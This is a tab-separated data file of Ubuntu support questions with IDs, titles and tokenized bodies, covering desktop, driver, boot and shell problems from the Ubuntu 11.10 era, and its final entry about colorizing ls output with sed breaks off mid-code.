70949	is there any way i can run xampp on 11.10 x64 ?	running xampp says it requires a 32 bit system . is there a workaround , or a different software i can use ? ? i am indeed aware of the lamp-server installation available in ubuntu , and am currently using it . but i was specifically asking for a integrated lamp software like xampp which makes it easier to manage the lamp installation . currently xampp runs only on x86 systems , and i have a x64 bit install . hence the question .
70950	what icon does unity use for an application ?	i have a .deb package that installs application icons under the following locations : /usr/share/icons/hicolor/16x16/apps/ /usr/share/icons/hicolor/48x48/apps/ /usr/share/icons/hicolor/32x32/apps/ /usr/share/pixmaps/ after i installed the .deb package and replaced the installed icons with new ones ( on disk ) , the old icon still shows up in unity . what icon does unity use for the application ?
70953	how to start an application from the terminal ?	i 'm getting started on the ubuntu terminal . how can i start an application ( for example , compizconfig settings manager ) from the terminal ? which command do i have to use ?
70956	error while building rt73-k2wrlz-3.0.3 from source	i 've already install the build-essential package but it does n't work that 's right i 'm trying to compile a wireless driver i 'm trying to use aircrack-ng so i need to patch the driver of my wireless adapter it 's supposed to work typing the followings lines tar xfj rt73-k2wrlz-1.3.0.tar.bz2 cd rt73-k2wrlz-1.3.0/module make make install cristian @ cristian-pc : ~ $ sudo su [ sudo ] password for cristian : root @ cristian-pc : /home/cristian # cd downloads root @ cristian-pc : /home/cristian/downloads # cd rt73-k2wrlz-3.0.3/module root @ cristian-pc : /home/cristian/downloads/rt73-k2wrlz-3.0.3/module # make make [ 1 ] : entering directory `/usr/src/linux-headers-3.0.0-12-generic' building modules , stage 2 . modpost 0 modules make [ 1 ] : leaving directory `/usr/src/linux-headers-3.0.0-12-generic' rt73.ko failed to build ! make : *** [ module ] error 1 root @ cristian-pc : /home/cristian/downloads/rt73-k2wrlz-3.0.3/module #
70958	can not play music using rythmbox/banshee/quod-libet	getting following error : 0:00:06.823128951 9039 0xa06fbe0 error avdtpsink audio/gstavdtpsink.c:1328 : gst_avdtp_sink_audioservice_recv : < avdtpsink > bt_get_capabilities failed : input/output error ( 5 ) 0:00:06.823219466 9039 0xa06fbe0 error avdtpsink audio/gstavdtpsink.c:791 : gst_avdtp_sink_get_capabilities : < avdtpsink > error while getting device caps 0:00:06.823253130 9039 0xa06fbe0 error avdtpsink audio/gstavdtpsink.c:901 : gst_avdtp_sink_start : < avdtpsink > failed to get capabilities from device after clicking on play , the following dialog box pops up : gstreamer output pipeline could not be initialized . the pipeline might be invalid , or the device may be in use . check the player preferences .
70966	disable transparency mplayer in script	i am working on a short script that will allow me to use video files as a background using mplayer . the code i 've got so far is : # ! /bin/bash if zenity -- question -- title= '' run movie as desktop background ? '' -- text= '' this script will allow you to play a movie on the desktop within your xgl environment.\n\nclick the ok button and choose the movie from the file selection . '' then xwinwrap -ni -o 0.6 -fs -s -sp -st -b -nf -- mplayer -loop 0 -wid wid `` `zenity -- file-selection` '' fi the problem is that when using the script the desktop and stuff on it are still visible ( see image ) and i 'm looking for the code to disable the transparency . thanks in advance and greetings from tinuz : )
70968	how to customize/remove the home lens of the dash ?	question 1 ) the dash always open on a home ( “shortcuts” ) tab ( “lens“ ) . i do n't have any need for it ( browser and e-mail client manually installed , no virtual music player , no photo manager… ) . is there a way to remove this lens , or customize its content , or make another lens the default one ? question 2 ) ( by the way , does someone know how to customize preferred applications more precisely than with information→defaults that shows only few choices ? perhaps via gconf or somewhere ? )
70969	how can i use gnome shell by default instead of unity ?	i do n't like unity much . i have no trouble to log out and log back in with gnome , but if i reboot my computer it goes back into unity by default . how can i make gnome default instead ?
70971	opening terminal takes longer while using gnome shell	in ubuntu 11.04 , loading the terminal with a keyboard shortcut was really quick . when i started using ubuntu 11.10 ( with unity ) i noticed it took a little while . then i remembered about the preload app ( and how it sped up the loading of applications by cache-ing ) and the times were reduced immensely . as i tried gnome shell , i started to realize i liked it better than unity ( still not 100 % secure heh ) ; but there is a big drawback : terminals seem to take ages to load . just to illustrate , i just opened libreoffice writer in about 4/5 of the time it takes to open a terminal . why is this happening , and how can i fix it ?
70975	software centre and evolution think i am offline using wicd to make wireless connection	i upgraded to 11.10 yesterday . i use wicd to make the wireless connection because i have never managed to get network manager to make a wireless connection on any computer i have installed it on . but since 11.10 both evolution and software centre are convinced i am offline even though i have a functional connection ( i am using wifi now and both are reporting me offline , which i clearly am not ) . i am using an msi wind clone advent 4211 b netbook . network manager has never worked on this computer for wifi . wicd can make connection about 30 % time ( often returns bad password , first few attempts ) . xp of course works fine to make wifi connection . i have a i am happy to supply more information i just do not know what information might help . i have reported a bug against evolution
70979	fixed columns ' width in nautilus	in ubuntu 11.10 the nautilus version has a new feature , as you can see : it adapts the column 's width to the content of the column itself ( at least for the name column ) . this behavior is not always desirable , so i am looking for a way to disable it .
70986	how to install usc 5.0 in 11.04 ?	is there a way i can install the ubuntu software center 5.0 on ubuntu 11.04 natty narwhal ?
70989	need to move my swap partition to let my root partition grow . how ?	i have a virtual box ubuntu guest and i need to have more space on my disk ( actually it 's 8 gb ) . i have already increased the space allocated for the vdi to 16 gb . now with gparted live i 'm trying to expand my partition , but the swap blocks the expansion , as is in this image i 'm going to do some move/resize to get the unallocated space near the /dev/sda1 . the operations are these : now , if i do this , surely i will have problems with the next boot . what i have to do to fix that ?
70990	top panel does n't stay above windows	i made as small ( 16 % width ) top panel . it suddenly gets hidden behind overlapping or maximized windows . neither ' ... panel as dock ' , 'reserve space ... ' , nor automatic hiding are checked . how do i make it stay on top ? i already tried creating a new one , but the problem remained .
70995	desktop runs very slick , animations are all fast and flawless . moving windows around , however , is very laggy . why ?	this is n't a question about ubuntu being laggy in general - not at all , in fact , it 's very slick and fast for me . clicking the `` workspace switcher '' in the dock performs the animation immediately and very smoothly . switching between workspaces with the arrow keys - again , flawlessly . my computer has a resolution of 2560x1440 on a 27 '' display ( no , not an apple product - though my monitor has the same panel that apple use in their cinema displays ) . it 's powered by an nvidia geforce gtx 470 - easily enough to handle it - and an intel i3 . hardware is not the issue . i am running ubuntu 11.10 ( upgraded from 11.04 ) . i had the same issue in 11.04 . i 'm running the `` nvidia accelerated graphics driver ( post-release updates ) ( version current-updates ) '' from the additional drivers dialogue . two drivers have been suggested to me via that dialogue and i 've tried both - same effect with each . the driver is `` activated and currently in use '' . any other information required , let me know and i 'll post it . i 'm a programmer who works with linux daily ( both as a job and as an interest ) so technical instructions are fine . i 've noticed that compiz uses a lot of cpu when moving windows around and it 's memory usage is relatively high ( though possibly expected for compiz ) : 1671 user 20 0 478m 286m 33m s 1 7.3 12:44.05 compiz and one more thing - occasionally moving windows around is fast . but it only happens when all applications are closed , and even then it sometimes does n't . something must be interfering , but what ? i 'll try and find out but in the meantime , any suggestions are much appreciated : - )
70998	can`t boot into ubuntu 11.10 64bit	i 've already installed ubuntu 11.10 64bit version on my pc , but it won`t boot into ubuntu . i only get black screen then system suddenly reboot and then i only got blank flickering screen i`ve already tried installed it without downloading update and third party software , but i still got the same result my partitions for ubuntu are : 4gb /swap ,12gb / ,8gb /home my pc spec : unlocked phenom x4 b45 , ati radeon hd 6850 , 4 gb of ram
71003	can grub error messages be hidden , as ubuntu continues to load regardless ?	can grub 'error ' messages that appear over the blue splash-screen be made to be hidden , as grub continues through to load ubuntu without any problems , and there are no effects within the desktop environment ? grubs version is 1.99 rc1 . regards livio
71005	desktop crashes after starting compiz manager and press on plugins menu	my ubuntu 11.10 destroyed my desktop after running compiz manager and pressing on plugins menu . after pressing , the harddrive was working a lot ( at least 5 to 10 minutes ) . after this , my sidebar disappeared and only a menu of the file manager was displayed . i could not reset unity by using unity -- reset , because it stopped at a point . i had to reinstall the whole system . system update by using live cd did n't solved the problem ( desktop was still destroyed after this installation ) , therefore i had to remove the old system and to reinstall the whole system again . this is the second time that compiz manager destroyed my desktop . in ubuntu 11.04 i had the same problem for months ago . my hardware is as follows : intel® core™2 duo cpu e8400 @ 3.00ghz × 2 motherboard p5k-e wifi 8 gb ram ubuntu 11.10 x86_64 how can i avoid this problem in the future ? exist there an known bug with this hardware ?
71008	how do i customize desktop wallpaper slideshow ?	i spent some time and tried various things but nothing works . here 's what i have tried so far ( changing the slideshow manually ) : making a new folder /usr/share/backgrounds/mywallpapers and add my own background-1.xml in there . copying a bunch of my own wallpaper files into /usr/share/backgrounds/ copy /usr/share/backgrounds/contest/background-1.xml to /usr/share/backgrounds/ i logged out and in and still no changes in appearance app . i have heard about wallch but i do n't want some app running in the background all the time . i 'm not even sure wallch will work with gnome 3 . i also tried gnome-3-wp ( gnome 3 wallpaper slideshow app ) but it just seems broken for ubuntu 11.10 oneiric . anyone has a solution ?
71010	what is the best antivirus application available for non-technical users ?	i am looking for an antivirus for ubuntu , and have researched potential products . i do not want a paid product , but i do want a user friendly interface . i do not want rants about how unnecessary it is on ubuntu . my considerations are : avast ! linux home edition ( free with registration , 27.7mb ) avg anti-virus free edition for linux ( free , 138mb ) avira antivir personal ( free , 54.46mb ) bitdefender for unices ( free with registration , 27.7mb ) clamav ( open-source , free , 45.8mb ) my concerns are : ease of scan ease of update ease of schedule detection rates which , if any , come with good guis ? note : i am willing to do complicated setup , so long as my great aunt can use it .
71014	how to connect to a wireless router	i upgraded from 11.04 to 11.10 and used a wired connection to do this . now i cant connect to my wireless router . how do i set this up ?
71018	save workspace between boots on linux	is there a way to save my workspaces ( the windows i have open ) so that when i restart my computer , all my of the windows will be reopened and positioned in the same way ? i have ubuntu 11.04 and run gnome
71022	how to change the default font used in ubuntu 11.10	i downloaded a font and i want it to be used instead of the ubuntu default font in files & folders names & the web browser , if there is a way to do so please tell me . thanks
71026	small swap size in ssd notebook	i have read a lot of questions and answers about swap size but i am still quite confused . i have also read this article , which suggests swap size of half to two times of ram , depending on low/high ram and low/high disk space . https : //help.ubuntu.com/community/swapfaq my question is : i am going to buy an ssd notebook with 4gb ram , what will be the consequences if i set the swap size to be 1gb or even 512mb only ? ( and can i have no swap at all ... ? ) i do not use hibernation and i do not use software that consumes a lot of ram . the usual activities are : listening to music , surf internet , bt , browsing photos ( not edit ) , converting video etc . thank you .
71027	`` fails to install drivers '' error with a bcm 4312	i am using a dell inspiron 1464 . my wlan card is a dell wireless 1397 whose chipset is made by broadcom . the chip is bcm 4312 . in ubuntu 11.04 my wlan card is detected and proprietary drivers have installed successfully . everything seems to be working fine . the problem is in ubuntu 11.10 . it detects my wlan card , but when i press activate it says `` failed to install drivers ' . what could cause this error message ?
71031	ntfs partition becomes read-only after system upgrade ?	i was using ubuntu 11.04 on my laptop . while installing it from a dvd , i have created a 10 gb ntfs partition at the beginning of the hard disk , as primary . all other partitions ( swap , a ext3 , a ext4 and a fat32 ) are created in as logical in the extended partition . all were working well in ubuntun11.04 . now the system was upgraded to ubuntu 11.10 via internet and was sucessful . but unable to either create folder/files or to write to existing files in the said ntfs partiton . but files in the partition can read - means mounting done . same is the case even if logged in as root also . fortunately no such problem with other partitions including fat why it is so , please help .
71033	closing the lid is n't toggeling standby anymore after update in lubuntu . how can i fix that ?	on my netbook closing the lid only leads to lock screen and not to standby in lubuntu . that happened after the update on 11 . 0 . in 11.04 that worked without problem . also , in 11 . 10 ubuntu ( unity ) closing the lid leads to standby . so how can i achieve the same in lubuntu 11.10 ?
71036	gnome shell 3.2 freezes on search	i have gnome shell 3.2 and a gnome 3.2 theme installed . but when i use the search bar in activities , gnome shell freezes and i am left with no other option except to restart the system . is this a bug ? or is there any solution for this ?
71037	why is there no visual feedback when i click an icon in the launcher ?	whenever i click on the icons in the unity launcher , no visual feedback is shown . the application just opens . without the visual feedback , i wo n't be able to know whether the click event was registered properly . i end up clicking multiple times , which causes same application to open multiple instances which is a bit irritating . those of you who have used a mac will know that clicking the icons in the dock causes the icons to jump which affirms that the click event was registered properly on the icon . is this a bug or is this intended behaviour ?
71040	what does happens when you type set in terminal	i wanted to see if set does mean something and i typed it in terminal and after that i got huge code which does n't even fit in my screen . so i wanted to ask what does it do ? i hope i did n't broke something in ubuntu after typing it ?
71041	is there a terminal logout that does something like what gnu screen does ?	as most of you know gnu screen is a nice tool that enables you to do something like : one other good use for the detach and reattach is as a console-mode `` remote desktop '' feature . you can detach from a screen session at work , shell into the machine from home , and reattach . very , very handy . with a bit of extra work , you can even have a number of terminals all attached to the same session -- great for collaborative efforts and meetings . now im curious is there a way to do that without screen . aka instead of logut i type magiclogout and next time i login i get my old sesion ( if os hasnt reeboted ofc )
71042	is there a future for gnome classic ?	note : this question has the potential to cause unneccessary debate about the merits and demerits of unity , gnome3 , and gnome classic . i would like to avoid that and concentrate solely on the issue of future support for gnome classic . thanks for your help ! i am using gnome classic , which suits me more than either unity or the gnome3 shell . i think it has the potential to be the best of all possible worlds , in that it has the new gnome3 code base which appears to be faster and more stable , and also approximates the things that i feel made the gnome 2.2 shell great . however , it is not perfect . there are some minor faults in the way panels , the desktop , and other details are handled . over time , by asking questions and hopefully getting help , maybe i could resolve those issues and arc towards a ui that i fully enjoy . also , i would hope that simultaneously , there are big fixes and development happens . however , i am unsure about whether or not this is worth the effort . is gnome classic just the remnants of gnome 2.2 , and will not be supported or developed further ? is there a chance it will be forked and possibly expanded upon ? is there anyone who is working to make gnome classic equal in priority to the other shells ? in order to make decisions about whether or not it 's worth asking questions , i 'd like to know if gnome classic is a living , breathing , project , or , is it dead on arrival ? will it cease to even exist in ubuntu 12.04 ?
71043	does gnome-shell require more resources from my memory and/or hardware than unity ?	i found a script online which lets me confirm that unity will work just fine with my computer ( i think i found it on omgu ! if anyone needs the link i 'll add it ) but when i try to log in using gnome-shell the system hangs badly , even when doing things as simple as trying to browse my applications . is it possible that i would have problems running gnome-shell even though unity 3d works fine ?
71044	problemas de resolucion de juegos en wine / game resolution problems in wine	cuando salgo de un videojuego que tiene una resoluci贸n inferior a la del sistema , ubuntu se queda con una resoluci贸n baja . tengo que cerrar sesi贸n y volver a entrar para corregir el problema . 驴como lo puedo solucionar ? when i leave a game that has a lower resolution than the system , ubuntu is stuck in a low resolution . i have to log off and log back in to correct the problem . how can i fix this ?
71047	adding a custom launcher to unity	i understand that i should be able to right-click on my unity desktop and select 'create launcher ' . i do n't have that menu option . please advise . thank you .
71048	unable to have internet connection with huawei e367 , mobile broadband	my dmesg , some extra at the head and tail : [ 146.345953 ] bluetooth : l2cap socket layer initialized [ 146.352066 ] bluetooth : sco socket layer initialized [ 146.373036 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 146.373042 ] bluetooth : bnep filters : protocol multicast [ 148.066397 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro , commit=0 [ 148.319003 ] init : plymouth-stop pre-start process ( 1501 ) terminated with status 1 [ 226.325840 ] ppp bsd compression module registered [ 226.364372 ] ppp deflate compression module registered [ 314.192053 ] usb 1-5 : new high speed usb device number 4 using ehci_hcd [ 319.517640 ] cfg80211 : calling crda to update world regulatory domain [ 319.541413 ] cfg80211 : world regulatory domain updated : the lines starting with `` ppp '' means that my device e367 can connect to the operator 's network via usb-2.0 in thinkpad x60 . the device get an ip , so after running ifconfig we get : ppp0 link encap : point-to-point protocol inet addr:10.20.38.151 p-t-p:10.64.64.64 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1500 metric:1 rx packets:11 errors:0 dropped:0 overruns:0 frame:0 tx packets:12 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:3 rx bytes:158 ( 158.0 b ) tx bytes:269 ( 269.0 b ) the packet loss is however 100 % when i try to ping , for instance ping google.com . i am not sure where the problem is . i know that the thing is not reboot problem , since i have rebooted my system now 18 times with different configs . should not be in the hardware , since i can replicate it with two thinkpad lenovo x60s with clean ubuntu 11.10s ; however worked for some reason in 11.10 beta . not a softblock or hardblock problem , since i can see it with rfkill list . not a blacklist problem , since i have nothing in my personal blacklists and the default blacklists are not changed . my dongle e367 works , since i verified it in the operator 's shop with xp and windows 7 pieces of information about the connection that does not get internet although it should : how can you use huawei e367 with your mobile broadband successfully ?
71050	why do n't some of my applications show up in the launcher when opened ?	sometimes when i open an application , the program will open , but it wo n't display in the launcher or in the alt+tab dialog . here 's a screenshot of vlc open : as you can see , the icon does n't appear in the launcher even though it 's clearly open . i 'm also not able to drag the vlc icon from the dash into the launcher , like i can with other programs . right now i can only get it to work with vlc , but the other day it also happened to transmission . note that some other applications ( e.g. , terminal , chromium , etc . ) are all fine . also , it 's not always this way . vlc was working just fine yesterday , for example , but then this morning it stopped . it 's really frustrating because i have no way of accessing that window other than minimizing everything else to make sure nothing covers it up .
71051	dv6 1149wm 's fingerprint reader ?	is there any driver for my fingerprint reader on my hp dv 1149wm laptop ? this is my device : bus 004 device 002 : id 138a:0018 digitalpersona , inc
71052	ca n't login mounted home directory mounted after upgrade to 11.10	i have a home directory mounted from a file server ( openfiler software ) , with an entry in the file /etc/fstab it worked well with ubuntu 10.04 , 10.10 , and 11.04 the line in the /etc/fstab file is similar to this : 192.168.0.100 : /mnt/vg1/v1/users/user1 /home/user1 nfs rw , hard , intr 0 0 ( i follow guidelines from here : https : //help.ubuntu.com/community/settingupnfshowto ) after upgrading to 11.10 , when trying to login , it returns me back to the login screen . if i remove the entry in the fstab file , and therefore use a local home directory for that user , login works fine . there are some other reports that suggest deleting the .xauthority file . i tried that and it did n't help . i thought some files may be causing trouble , so i deleted all the . * files except for some that are obviously application specific ( .dropbox , .mozilla , .thunderbird , etc ) . then i copied the four files that ubuntu places in the home directory of a new user . any suggestion ?
71053	lost application menu 10.04 after upgrade	after upgrade of 10.04 netbook remix edition to kernel 2.6.32.35 generic i lost application menu and now i have a clean desktop without any icon and a top bar with those icons : show desktop , usual icon network , battery , mail , date and switch off . i 'm able to recover application menu pressing [ alt ] +f1 , how i can fix it to the top bar or better show icons as was before ?
71054	why are all the people colored blue in my videos ?	after installing a fresh version of ubuntu 11.10 on my pc ( 64bit version , intel quad core , nvidia gpu , installed 3rd party drivers and codecs ) i 've tried to watch a movie . i 've open the movie both with vlc and with movie player and something with the colors did n't seems right , it took me few more seconds until few people started to appear on the screen but their body color was smurf blue . it also happened on my pc when i 've upgraded from 9.10 to 10.04 and seems like opening the video with video player - > properties - > display - > reset to default solved the problem , but that was a temporary fix and i had to retake these steps on each restart . this time , it seems that nothing helps , and all i get is human-like smurfs . any idea how to solve it ?
71057	how to change fonts using gnome-tweak-tool ?	as a non-techie type user , i 've managed to find the `` advanced settings '' option in the `` other '' menu listing , which is good ( sort of ) . in the past , i 've routinely installed the windows fonts from my windows partition . now even though i have the msttcorefonts package installed , and all of the .ttf windows fonts installed ( as far as i can tell ) , it does n't matter whether i log out and back in ( which in the past has brought up some of the stuff i 've wanted installed ) , or even if i just restart the ubuntu completely from boot , none of them are listed . so how do i make the gnome tweek tool see the directory with all the fonts in it please ?
71063	how to shutdown the computer with physical power button or by closing the lid ?	does anyone know how to fine tune power settings in 11.10 such that i can turn off the power immediately ( no dialogue box ) by pressing the physical power button or closing the lid ? it was easy to do this in 11.04 and earlier versions , but in 11.10 the power settings are pretty minimal . i 'm a bit of a gui slave , so if this requires cli i 'll need some training wheels to guide me through it . thanks for suggestions . my favourite thing about ubuntu has always been the ease of customizing it , but with 11.10 it seems more and more difficult to point and click your way to a custom set up .
71067	desktop theme becomes ugly after running `` unity-greeter '' from terminal	my desktop theme becomes ugly ( like windows 95 ) after i run `` unity-greeter '' from terminal . i was using ambiance theme before the incident . i 'm really frustrated right now .
71074	what package is meant to replace thinkfinger in 11.10 ?	my laptop has a fingerprint reader that until 11.10 i used via thinkfinger . that package is no longer in the repositories , but i assume there’s a different package meant to support fingerprint readers in thinkfinger’s place . what is the recommended fingerprint reader package ? should i just find thinkfinger on my own and use that instead ? here’s my reader’s lsusb output : bus 003 device 002 : id 0483:2016 sgs thomson microelectronics fingerprint reader
71079	how do i remove my ubuntu one account ?	i do n't want to cancel a subscription to a service . that is all that i could find with 'how to eliminate/deactivate ubuntu one account ? ' search . on the ubuntu one page there is a faq with the following : 'how do i downgrade or cancel my ubuntu one account ? ' which only gives the following information : 'do you want to either downgrade or cancel you ubuntu one plan ? both the downgrade and cancel options are available in the account area . https : //one.ubuntu.com/account/ under 'services ' > 'your storage ' . click on the grey `` see details '' button next to all the subscription ( s ) you want to cancel and then click the `` cancel this subscription '' button . ' in the tos it says : ' cancelling your account . you may cancel your account at any time through the ubuntu one website . you must cancel your service before it renews in order to avoid billing of the next period 's fees to your credit card . you will not be charged at the next renewal date , but canonical does not provide refunds for any previous billing periods or partial billing periods . we will not charge a fee for cancelling your account . ' please tell me how to cancel an account . not deactivate or suspend or disable services .
71080	wireless connection does n't work on a bcm4311	i upgrade to 11.10 and i can no longer connect . i 'm very much a newbie when it comes to linux , so any explanation would be much appreciated . after upgrading to 11.10 , the startup screen started saying `` waiting for network configuration '' and after a minute or so it would then say `` booting without network configuration '' . i have a dell vostro 1000 ( not sure the year ) after typing sudo rfkill list i get 0 : dell-wifi : wireless lan soft blocked : yes hard blocked : yes any suggestions ? and sudo rfkill unblock all does n't change anything . the network controller is bcm4311 802.11b/g wlan and the ethernet controller is a bcm4401-b0 100base-tx i now believe that the problem with my wired connection is a faulty ethernet cable or physical hardware that connects to the ethernet cable as i got the wired connection to work but is sensitive to being physically touched , i which case i would still like to get the wireless working
71081	wubi error `` there is no disk in the drive ''	it gives me three options `` cancel '' `` try again '' `` continue '' but everytime i click any of them it just pops back up . after a long time of clicking continue it brought me to the normal screen and i installed ubuntu along side windows but when booting in to it , it says : no root file system defined '' and i cant do anything ! please help ! i tried disabling usb devices as reported in this bug and such and after the install and when i 'm booted into ubuntu i still get the `` no root file system defined '' error
71082	is it possible to have a dynamic application launcher with different icons ?	( ubuntu 10.04 , gnome 2.3 ) is it possible to have a dynamic application launcher with different icons ? my launcher starts a shell script to mount/unmount a hard disk drive and i 'd like to let it change the icon of the launcher , too . like an indicator showing the status of the hdd . thanks
71083	what are the default settings in debconf 's configuration ?	i had to run dpkg-reconfigure -a for certain reasons , and consequently given options for configure debconf . but i do n't really know how those change things , and want to use the default settings .
71086	how do i install drivers for an hd6950 ?	i have a hd6950 graphics card and a fresh install of ubuntu 10.04 . i have a syncmaster 2032bw monitor that can handle resolutions upto 1680x1050 . ubuntu will only let me put my resolution upto 1280x1024 , calls my monitor 'unknown ' and wo n't let me enable any visual effects . there are no entries in system > administration > hardware drivers . i 've been looking at the guide here . and there is an amd driver here . i was wondering if i should try and install the proprietary driver manually or the opensource driver . i would appreciate some advice as i ca n't get a decent resolution or visual effects that i could on my old 8800gt !
71093	how to become administrator again	well i was messing around with the user accounts and i noticed that my account was listed under `` administrator '' . i knew that was n't right , since i had to use sudo to install stuff and get root privileges , so i unlocked user accounts and set my account from `` administrator '' to `` standard '' . then i changed my mind and wanted to keep `` administrator '' , even if i had to use sudo . so i unlocked it again ( i stupidly went to sound settings or something , then went back ) , but it did n't accept my password . so now that is messed up . i also can not install software , and probably ca n't do anything else root can . so my question is this : is there any way to get my account back to administrator ?
71098	broken unity / compiz on an ati mobility radeon hd3650	i 'm running ubuntu 11.10 x86_64 , with graphic ati mobility radeon hd3650 unity does n't start , but i still have unity 2d . i tried compiz -- replace it gives me : checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : default adding plugins skipping upgrade com.canonical.unity.unity.01.upgrade skipping upgrade com.canonical.unity.unity.02.upgrade initializing core options ... done ... ... initializing fade options ... done initializing scale options ... done initializing session options ... done compiz ( core ) - warn : no exact match for configurenotify on 0x2e00092 ! compiz ( core ) - warn : expected the following changes : compiz ( core ) - warn : sibling : 0x43ee95 compiz ( core ) - warn : instead got : compiz ( core ) - warn : x : 0 compiz ( core ) - warn : y : 0 compiz ( core ) - warn : width : 1440 compiz ( core ) - warn : height : 900 compiz ( core ) - warn : above : 0 compiz ( core ) - warn : this should never happen . you should probably file a bug about this . setting update `` left_key '' setting update `` right_key '' setting update `` up_key '' setting update `` down_key '' thanks for your answers .
71101	ask about a shortcut in kile under ubuntu 11.10	after updating to ubuntu 11.10 , i find that whenever i tap alt , the menu will be selected . then when i move my cursor by using left or right keys , it moves along the menu . the same happens in ocular . does anyone knows how to change this setting ? since i use many alt+ ... shortcuts in kile , i do n't want that each time i tap alt , the menu is selected . i want that the focus is always on the text when i tap alt . thank you very much ! anand
71106	quick find in nautilus is broken	this is a bit difficult to explain , so i 'll present it as 'what i do'/'what should happen'/'what happens ' . what i do : i open a directory and i want to find a file/folder by typing the first letters of its name - its a feature i use a lot . then i hit alt+backspace . what should happen : the last character in the quick find box should be deleted . what happens : i go up one directory . it 's as if the letter box does n't hold the keyboard focus . does that happen for other people , and is there a way to fix it ?
71109	what plugin do i need to get dvd use ?	i installed the vlc and despite that , my ubuntu 11.10 does not read dvds . what did i do wrong ? i installed twice ? best regards for best answer . roman
71110	network printing requires authentication	i am trying to print a pdf on an ubuntu , and the printer is hooked up to my windows desktop . everything is going fine , but when i test-print a page , it asks me for authentication . the default username is francislau and there is a blank password box . i tried my ubuntu password but it was incorrect . does anyone know what the credientials are ?
71112	grub `` unknown filesystem '' error on boot	when booting via grub i get the following error : error : unknown filesystem . grub rescue > ls ( hd0 ) ( hd0 , msdos7 ) ( hd0 , msdos6 ) ( hd0 , msdos5 ) ( hd0 , msdos1 ) ( fd0 ) grub resuce > set prefix= ( hd0 , msdos5 ) /boot/grub root=hd0 , msdos5 if i change the root and prefix to hd0 , msdos6 i can boot successfully . except grub encounters the same error when i reboot . how can i get grub to remember these settings ? potentially useful information : i am using raid0 and grub is installed to /dev/mapper/isw_fbifcgeic_raidvolume0 in linux ( ubuntu 11.10 ) my grub.cfg points to root at ( hd2 , msdos6 ) grub-mkdevicemap -m - lists the /dev/mapper entry at hd2 any help would be much appreciated ! it 's super annoying needing to rescue grub every time i boot my system .
71116	ca n't get classic gnome desktop set permanently ?	i have followed instructions to set the gnome classic as default desktop permanently here : how to make gnome classic the default desktop using command line tools ? but every time i reboot the ubuntu desktop comes up and the file is changed back . how do i set the classic gnome desktop permanently ?
71117	static sounds every 20-30 seconds when playing hdmi	when i play a movie on my tv through hdmi , i hear periodic short static sounds . this happens with all players in ubuntu , so this is not a problem with the player . when i play a movie through hdmi in windows the audio is fine , so this is not a hardware problem . i managed to set vlc to using alsa from its preferences dialog , and i know that for sure because my volume control icon became disabled . but vlc 's audio was working great , static sounds were gone , and additionally some audio sync issues i had with vlc were gone when using alsa . so are those problems all connected to pulseaudio , and how can i force vlc not to use it and use alsa instead ?
71118	compiling a libusb example program	i recently installed the library libusb by doing this : sudo apt-get install libusb-1.0-0-dev i have a directory with examples that looks like this : penguin @ penguin-satellite-a505 : ~/downloads/libusb-1.0.0/examples $ ls -la total 124 drwxrwxrwx 3 penguin penguin 4096 2011-10-23 11:38 . drwxrwxrwx 5 penguin penguin 4096 2011-10-23 11:38 .. drwxrwxr-x 2 penguin penguin 4096 2011-10-23 11:38 .deps -rw-r -- r -- 1 penguin penguin 10781 2008-08-22 22:57 dpfp.c -rw-r -- r -- 1 penguin penguin 11644 2008-06-24 21:00 dpfp_threaded.c -rw-r -- r -- 1 penguin penguin 1643 2008-11-03 15:13 lsusb.c -rw-rw-r -- 1 penguin penguin 15923 2011-10-23 11:38 makefile -rw-r -- r -- 1 penguin penguin 356 2008-11-20 08:24 makefile.am -rw-r -- r -- 1 penguin penguin 16380 2008-12-13 12:07 makefile.in penguin @ penguin-satellite-a505 : ~/downloads/libusb-1.0.0/examples $ i am trying to compile lsusb.c . would anyone know how to do it ? my os is ubuntu 11.1 . thank you !
71122	i ca n't find my nautilus settings	my nautilus browser looks like this : i ca n't find the settings anywhere . i 've tried reinstalling nautilus .
71123	unchecking show menubar by default in new terminals wo n't save	i am unchecking `` show menubar by default in new terminals '' in gnome-terminal so that i can use alt+f and alt+b to move back and forth the text without raising the menu , but it wo n't save . once i have closed the terminal and open a new one , the menu is back there again . any ideas ? this seems to be a bug to me , so i have opened one in launchpad : https : //bugs.launchpad.net/ubuntu/+source/gnome-terminal/+bug/880739
71125	how do i set my laptop to shutdown instead of hibernating/suspending when i close the lid ?	i have a dell m4300 and the hibernate/suspend dos n't work properly . instead i would like to have it to shut down when i close the lid . i have not had this problem on earlier versions , but on 11.10 there is no option for shutdown on closing the lid in the powermanagement .
71126	how do i set the gnome classic login to be the default with autologin ?	i changed to gnome classic fallback , i auto-login but it defaults to unity 3d , how do i make auto-login default to gnome classic ?
71127	problem using `sed` to colorize `ls` output ( tenth back-reference `\10` not working )	i had asked this question a while back : is it possible to colorize permissions-part of the output of ls ? while the accepted answer in that question is ok , i now want to do the same thing without using any `` external '' language . i came up with the following using a bash function and sed . the question is can you help me fix one bug and also help me make this code `` better '' ? make better : i am repeating \ ( [ r- ] \ ) \ ( [ w- ] \ ) \ ( [ x- ] \ ) \ three times . how to make this more succint ? fix bug : i am unable to get a back-reference to the tenth match \10 . does sed only support up to 9 back-references ? the relevant portion of the code ( broken into multiple lines for purposes of better readability when posting in this question ) : ls -la | sed `` s /^ \ ( [ d- ] \ ) \ ( [ r- ] \ ) \ ( [ w- ] \ ) \ ( [ x- ] \ ) \ ( [ r- ] \ ) \ ( [ w- ] \ ) \ ( [ x- ] \ ) \ ( [ r- ] \ ) \ ( [ w- ] \ ) \ ( [ x- ] \ ) / `echo -e \ '' $ emg\1 $ emy\2\3\4 $ emr\5\6\7 $ emc\8\9\10 $ none\ '' `/ '' for reference , the complete function i am using is : domagic ( ) { local none= '' \033 [ 0m '' # unsets color to term 's fg color # regular colors local k= '' \033 [ 0 ; 30m '' # black local r= '' \033 [ 0 ; 31m '' # red local g= '' \033 [ 0 ; 32m '' # green local y= '' \033 [ 0 ; 33m '' # yellow local b= '' \033 [ 0 ; 34m '' # blue local m= '' \033 [ 0 ; 35m '' # magenta local c= '' \033 [ 0 ; 36m '' # cyan local w= '' \033 [ 0 ; 37m '' # white # emphasized ( bolded ) colors local emk= '' \033 [ 1 ; 30m '' local emr= '' \033 [ 1 